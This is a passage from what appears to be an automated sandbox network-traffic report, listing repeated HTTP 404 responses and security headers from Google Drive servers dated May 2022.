{"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:34 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-5TR+YQYXxdBETEJDvc23SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:34 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-7adeFdDPwj6EBsAKhL1+eQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:34 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-RKcA8rGNCLWqxvNIqG+bYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:35 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-gFr18jw+9Fq+up+enJ/PzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:35 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-j9pc8txi31PJ5wqm3nLeeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:35 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-+91qGc8kty6JEAlBF3YB+Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:35 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2ifhuK/LARXPihni/X8C3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:35 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-NHEXGovJX9zuS+8RoaF6+A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:35 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-KVmEr4SPczVyrQpTgZyxjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:35 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-6tnvC0xY12taw1vnlZt0Lg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:36 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-F+3uIB/JKwEiFWg0CDMt5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:36 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-vnZTLga3i2+D4T8bQOOwfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:36 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-JP+o8+isfzLxsxEPmzb9kA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:36 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2Q0pg/KDTPML4b8+6nhGIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:36 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-0QscEfeosSOAXYJzN48dFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:36 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-SGJAy9Y4v5Sdqiez1sVXAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:36 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-k05D/Zol87qAUk7GvKcQ2w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:37 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Q9+GTaAsWoNFVL2nJWwEJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:37 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-6OlFSOcEjuE9hieFbs6XfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
